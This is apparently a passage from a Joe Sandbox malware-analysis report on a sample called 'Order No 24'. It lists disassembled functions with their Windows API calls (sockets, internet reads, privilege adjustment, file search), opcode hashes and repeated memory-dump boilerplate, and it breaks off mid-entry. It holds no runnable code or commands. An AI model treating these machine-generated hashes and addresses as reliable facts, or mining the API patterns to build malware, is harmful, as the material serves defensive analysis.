                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1605983538-0
                                                                                                                                  • Opcode ID: c37b9ac452bb42035f03e978ae19fa4278e9829ccffc863bb5983e9f536bc87a
                                                                                                                                  • Instruction ID: badf1b2a0c68fff2935bbda99ac17583badb0f099fccaa8e63079f1a7a80a860
                                                                                                                                  • Opcode Fuzzy Hash: c37b9ac452bb42035f03e978ae19fa4278e9829ccffc863bb5983e9f536bc87a
                                                                                                                                  • Instruction Fuzzy Hash: 9D216571D00258ABDB10EBA4CD89FDDB7BCAB49300F5004A9F545E7141DB759F85CBA2
                                                                                                                                  Function 009D923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 009D9296
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009D92B9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4170576061-0
                                                                                                                                  • Opcode ID: c300bea4e2389986247adeefdff0603ca79dd75dbc43d74ef4f4d78668ffa7be
                                                                                                                                  • Instruction ID: 771fa28d72070523e1680dbec2e050a728fdfbe57307ea47181d8f097940e874
                                                                                                                                  • Opcode Fuzzy Hash: c300bea4e2389986247adeefdff0603ca79dd75dbc43d74ef4f4d78668ffa7be
                                                                                                                                  • Instruction Fuzzy Hash: 5F41AE71600204AFDB14BB68CC82F7E77EDEF84728F148449F956AB392DA749D028B91
                                                                                                                                  Function 009CEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009CEB8A
                                                                                                                                  • _wcscmp.LIBCMT ref: 009CEBBA
                                                                                                                                  • _wcscmp.LIBCMT ref: 009CEBCF
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 009CEBE0
                                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 009CEC0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2387731787-0
                                                                                                                                  • Opcode ID: acf7a439cbbeff18d026314e561a60d0c73ad23c8e040b11a48682d577e5b948
                                                                                                                                  • Instruction ID: 871bd9e65fe3259e14a0e87c76a288f6d0522bcfa891ffd89df18a948ae6999b
                                                                                                                                  • Opcode Fuzzy Hash: acf7a439cbbeff18d026314e561a60d0c73ad23c8e040b11a48682d577e5b948
                                                                                                                                  • Instruction Fuzzy Hash: 5B419075A046019FCB08DF68C491FA9B7E8FF89324F10455DF95A8B3A1DB31E941CB92
                                                                                                                                  Function 009E8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                  • Opcode ID: c5ad20497cd6a2e696a5a64da754b0b2b7dfc53fa74298863a61749a15a5b853
                                                                                                                                  • Instruction ID: bc45ab10fddfb9ab752836a2167f6c38950a48288aae0fc26ea3264da7eff6ed
                                                                                                                                  • Opcode Fuzzy Hash: c5ad20497cd6a2e696a5a64da754b0b2b7dfc53fa74298863a61749a15a5b853
                                                                                                                                  • Instruction Fuzzy Hash: B5119D327042546FE7226FAADC44B6FBB9CEF84760B050429F84AD7281DF30ED0386A4
                                                                                                                                  Function 00989B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                  • API String ID: 0-1546025612
                                                                                                                                  • Opcode ID: f5724729d5a52bf795f744eea8b682e295c60e778857d7ee0f2af473dc3427a1
                                                                                                                                  • Instruction ID: 959dd899b483742326112b514e45fe2be009fc00e5dde4bea0682cf4dba4a18b
                                                                                                                                  • Opcode Fuzzy Hash: f5724729d5a52bf795f744eea8b682e295c60e778857d7ee0f2af473dc3427a1
                                                                                                                                  • Instruction Fuzzy Hash: 3492A071E0021ACBEF24DF58D9807BDB7B1BB54314F1886AAE816AB380D7759D81CF91
                                                                                                                                  Function 0099E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0099E014,76230AE0,0099DEF1,00A1DC38,?,?), ref: 0099E02C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0099E03E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                                  • Opcode ID: 94207c3a3dd7b95829e4a21ea1a3e605c1d1ae6fa4e97c0f4e084e9d5f12bcc6
                                                                                                                                  • Instruction ID: 20ddedc2f1f2797698c99358655e8380c9ae7b1221c3310d452756bd2b99d16c
                                                                                                                                  • Opcode Fuzzy Hash: 94207c3a3dd7b95829e4a21ea1a3e605c1d1ae6fa4e97c0f4e084e9d5f12bcc6
                                                                                                                                  • Instruction Fuzzy Hash: E1D0C771504716AFDB31DFE5EC09762BAD9BB08711F288919F495D2150FBB4D8828750
                                                                                                                                  Function 009C13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009C13DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: ($|
                                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                                  • Opcode ID: 9e03d62d6af97c69c4c68cde6f2bc33c3257b8ae6a55a60a810457d2eab6f699
                                                                                                                                  • Instruction ID: 0e34f000f68fc2de87e9f4f442c4ff19ce511cec22bc52e289b0dec536c55e78
                                                                                                                                  • Opcode Fuzzy Hash: 9e03d62d6af97c69c4c68cde6f2bc33c3257b8ae6a55a60a810457d2eab6f699
                                                                                                                                  • Instruction Fuzzy Hash: 2D322475A006059FCB28CF69C490E6AB7F4FF49320B11C56EE49ADB3A2E770E941CB44
                                                                                                                                  Function 0099B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 0099B22F
                                                                                                                                    • Part of subcall function 0099B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0099B5A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Proc$LongWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2749884682-0
                                                                                                                                  • Opcode ID: 1bf16a31692855dc2bc7c3f1e6289f2589a65e9ef545a62b39f3052f80d53ef3
                                                                                                                                  • Instruction ID: 83e1345aacf114a487886dfec89c943ba93cf3e67d80b94439f66c892c9d875b
                                                                                                                                  • Opcode Fuzzy Hash: 1bf16a31692855dc2bc7c3f1e6289f2589a65e9ef545a62b39f3052f80d53ef3
                                                                                                                                  • Instruction Fuzzy Hash: 10A18870118008BADF38AF6E6E99E7F395EEBEA750B10491EF511D21A5CB2D9C019372
                                                                                                                                  Function 009D4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009D43BF,00000000), ref: 009D4FA6
                                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009D4FD2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 599397726-0
                                                                                                                                  • Opcode ID: c82a747db85d75e45dd34bf9a615bb510e2afe3bd81f9d002227eb8f53eadf7b
                                                                                                                                  • Instruction ID: a862ce0e97cf5b84e3ec3beb9150fc6d3678f85d32d3c4cade5f22c22ae36f18
                                                                                                                                  • Opcode Fuzzy Hash: c82a747db85d75e45dd34bf9a615bb510e2afe3bd81f9d002227eb8f53eadf7b
                                                                                                                                  • Instruction Fuzzy Hash: A041E771584209BFEB20DF98CD81FBFB7BCEB80754F10842BF205A6290DA719E4197A0
                                                                                                                                  Function 009CE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 009CE20D
                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009CE267
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009CE2B4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1682464887-0
                                                                                                                                  • Opcode ID: b20b052a7a4707468dbe0b8f76c3f047320d9a9da0c490591c014f238ce8db61
                                                                                                                                  • Instruction ID: 562d317aa0328a7fc19922901a3ec4206cf230488a560ac73c428f144a6d550d
                                                                                                                                  • Opcode Fuzzy Hash: b20b052a7a4707468dbe0b8f76c3f047320d9a9da0c490591c014f238ce8db61
                                                                                                                                  • Instruction Fuzzy Hash: 09213E75A00218EFCB00EFA5D885FADFBB8FF88314F0484A9E945A7351DB319906CB50
                                                                                                                                  Function 009BB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                                                                                                                    • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                                                                                                                  • GetLastError.KERNEL32 ref: 009BB1BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1922334811-0
                                                                                                                                  • Opcode ID: 659ee99379c8183d067d1736d340d3a6d597ae0c035ab0845caa5e04c4eb80b4
                                                                                                                                  • Instruction ID: b4daa20dd0ea285046babcf5214c19476b10762d0db0d31c11e3407d9fca9942
                                                                                                                                  • Opcode Fuzzy Hash: 659ee99379c8183d067d1736d340d3a6d597ae0c035ab0845caa5e04c4eb80b4
                                                                                                                                  • Instruction Fuzzy Hash: 4B118FB2504205AFE718DF98DD95E6BB7ADEB44720B20852EF45A97250DBB0FC428B60
                                                                                                                                  Function 009C6685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009C66AF
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009C66EC
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009C66F5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 33631002-0
                                                                                                                                  • Opcode ID: 73f0ab4761488ca81b1adb4ef4754f9bc6447d443c6662f1cee5d5a0ad007e73
                                                                                                                                  • Instruction ID: 10988c69fccdbdf52e9ff978f438bf1f53ba66e9a20b32fb2f00751c26c745fd
                                                                                                                                  • Opcode Fuzzy Hash: 73f0ab4761488ca81b1adb4ef4754f9bc6447d443c6662f1cee5d5a0ad007e73
                                                                                                                                  • Instruction Fuzzy Hash: C311A5B2D00228BEE710CBE8DC45FAFBBBCEB09714F004655F901E7190C2749E0587A2
                                                                                                                                  Function 009C71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009C7223
                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009C723A
                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 009C724A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                  • Opcode ID: 06741cde133c1092169eb43fc117ecbc5d491403d963a39219f5abf45e0dc572
                                                                                                                                  • Instruction ID: 17a3399db2023cb72cb470e5c0df09b5d707c40b216617aa73d45f65f459b995
                                                                                                                                  • Opcode Fuzzy Hash: 06741cde133c1092169eb43fc117ecbc5d491403d963a39219f5abf45e0dc572
                                                                                                                                  • Instruction Fuzzy Hash: CAF01D76A0420DBFDF04DFE4DD89EEEBBBCEF08301F104469A606E2191E2709A458B10
                                                                                                                                  Function 009CF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009CF599
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009CF5C9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                  • Opcode ID: 3f734a59fdf6d7ea300bfb5a7fbf795e3bf698bd4ededb3c7d2df255de4c55a1
                                                                                                                                  • Instruction ID: 39a39b77b87b2eee3a9d5e9cc98696fa3d7093c5fc9b3f6b0a501b577da95f70
                                                                                                                                  • Opcode Fuzzy Hash: 3f734a59fdf6d7ea300bfb5a7fbf795e3bf698bd4ededb3c7d2df255de4c55a1
                                                                                                                                  • Instruction Fuzzy Hash: A21161726006049FDB10EF69D845B2EB7E9FF88324F04895EF9A9D7291DB34E9018B91
                                                                                                                                  Function 009CCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009DBE6A,?,?,00000000,?), ref: 009CCEA7
                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009DBE6A,?,?,00000000,?), ref: 009CCEB9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                  • Opcode ID: 3816181c7f93ef39e752d7ffc470ea5ec7336136c25b2c34ac1ffc0ee56b7a60
                                                                                                                                  • Instruction ID: 6128f325551f887e417f8e91178e90a066efd6395ee82e73e8de19d6042cb30a
